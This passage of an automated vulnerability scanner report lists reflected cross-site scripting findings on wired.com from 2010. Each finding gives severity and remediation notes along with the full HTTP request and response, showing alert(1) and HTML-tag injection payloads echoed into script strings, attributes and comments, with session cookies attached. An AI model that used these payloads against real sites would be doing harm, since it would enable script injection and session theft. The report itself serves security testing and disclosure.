The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec059"-alert(1)-"4c1b2a1edb6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/the-casting-of-galaxy-questec059"-alert(1)-"4c1b2a1edb6/21738564001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:57:36 GMT
Date: Mon, 22 Nov 2010 00:52:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "the-casting-of-galaxy-questec059"-alert(1)-"4c1b2a1edb6","21738564001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1286. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/the-casting-of-galaxy-quest/21738564001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4f5"-alert(1)-"e85296498e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/the-casting-of-galaxy-quest/21738564001fa4f5"-alert(1)-"e85296498e4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=280
Expires: Mon, 22 Nov 2010 00:58:24 GMT
Date: Mon, 22 Nov 2010 00:53:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "21738564001fa4f5"-alert(1)-"e85296498e4","the-casting-of-galaxy-quest","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1287. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/the-casting-of-galaxy-quest/21738564001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 741cf"><a>d0dc860e958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/the-casting-of-galaxy-quest/21738564001741cf"><a>d0dc860e958 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=286
Expires: Mon, 22 Nov 2010 00:57:30 GMT
Date: Mon, 22 Nov 2010 00:52:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_the-casting-of-galaxy-quest c_21738564001741cf"><a>d0dc860e958">
...[SNIP]...

1.1288. http://www.wired.com/video/wired-magazine [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/wired-magazine

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24ae1"><a>6b2b010dbae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video24ae1"><a>6b2b010dbae/wired-magazine HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29356
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:56:20 GMT
Date: Mon, 22 Nov 2010 00:51:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video24ae1"><a>6b2b010dbae ss_wired-magazine">
...[SNIP]...

1.1289. http://www.wired.com/video/wired-magazine [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/wired-magazine

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ea593--><script>alert(1)</script>4f1270fd104 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoea593--><script>alert(1)</script>4f1270fd104/wired-magazine HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29404
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:12 GMT
Date: Mon, 22 Nov 2010 00:52:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoea593--><script>alert(1)</script>4f1270fd104/wired-magazine
-->
...[SNIP]...

1.1290. http://www.wired.com/video/wired-magazine [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/wired-magazine

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfc46"-alert(1)-"1b8a9910d86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/wired-magazinebfc46"-alert(1)-"1b8a9910d86 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:58:12 GMT
Date: Mon, 22 Nov 2010 00:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106698


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "wired-magazinebfc46"-alert(1)-"1b8a9910d86","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1291. http://www.wired.com/video/wired-magazine [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/wired-magazine

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d785"><a>b9ac96fbebb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/wired-magazine7d785"><a>b9ac96fbebb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=282
Expires: Mon, 22 Nov 2010 00:57:12 GMT
Date: Mon, 22 Nov 2010 00:52:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_wired-magazine7d785"><a>b9ac96fbebb">
...[SNIP]...

1.1292. http://www.wired.com/wired/coverbrowser/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b64e"><a>0440a54481 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser2b64e"><a>0440a54481/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29351
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:11:09 GMT
Date: Mon, 22 Nov 2010 01:07:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser2b64e"><a>0440a54481">
...[SNIP]...

1.1293. http://www.wired.com/wired/coverbrowser/1993 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1993

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effcc"><a>54cc432a143 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowsereffcc"><a>54cc432a143/1993 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=221
Expires: Mon, 22 Nov 2010 01:12:12 GMT
Date: Mon, 22 Nov 2010 01:08:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowsereffcc"><a>54cc432a143 c_1993">
...[SNIP]...

1.1294. http://www.wired.com/wired/coverbrowser/1993 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1993

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dee65"><a>afd4fe05db5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/1993dee65"><a>afd4fe05db5 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=218
Expires: Mon, 22 Nov 2010 01:12:28 GMT
Date: Mon, 22 Nov 2010 01:08:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_1993dee65"><a>afd4fe05db5">
...[SNIP]...

1.1295. http://www.wired.com/wired/coverbrowser/1994 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1994

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd84f"><a>055ac53fcac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowsercd84f"><a>055ac53fcac/1994 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:34 GMT
Date: Mon, 22 Nov 2010 01:08:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowsercd84f"><a>055ac53fcac c_1994">
...[SNIP]...

1.1296. http://www.wired.com/wired/coverbrowser/1994 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1994

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b287"><a>f4a04b9cc0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/19945b287"><a>f4a04b9cc0f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=221
Expires: Mon, 22 Nov 2010 01:12:39 GMT
Date: Mon, 22 Nov 2010 01:08:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_19945b287"><a>f4a04b9cc0f">
...[SNIP]...

1.1297. http://www.wired.com/wired/coverbrowser/1995 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1995

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 243b4"><a>a6be1769b46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser243b4"><a>a6be1769b46/1995 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=236
Expires: Mon, 22 Nov 2010 01:12:27 GMT
Date: Mon, 22 Nov 2010 01:08:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser243b4"><a>a6be1769b46 c_1995">
...[SNIP]...

1.1298. http://www.wired.com/wired/coverbrowser/1995 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1995

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c7e4"><a>35b2608d8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/19952c7e4"><a>35b2608d8b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=218
Expires: Mon, 22 Nov 2010 01:12:28 GMT
Date: Mon, 22 Nov 2010 01:08:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser c_19952c7e4"><a>35b2608d8b">
...[SNIP]...

1.1299. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1996

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2face"><a>4498e865eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser2face"><a>4498e865eb/1996 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=234
Expires: Mon, 22 Nov 2010 01:11:57 GMT
Date: Mon, 22 Nov 2010 01:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_wired ss_coverbrowser2face"><a>4498e865eb c_1996">
...[SNIP]...

1.1300. http://www.wired.com/wired/coverbrowser/1996 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /wired/coverbrowser/1996

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e82c0"><a>d25d8be8dce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wired/coverbrowser/1996e82c0"><a>d25d8be8dce HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
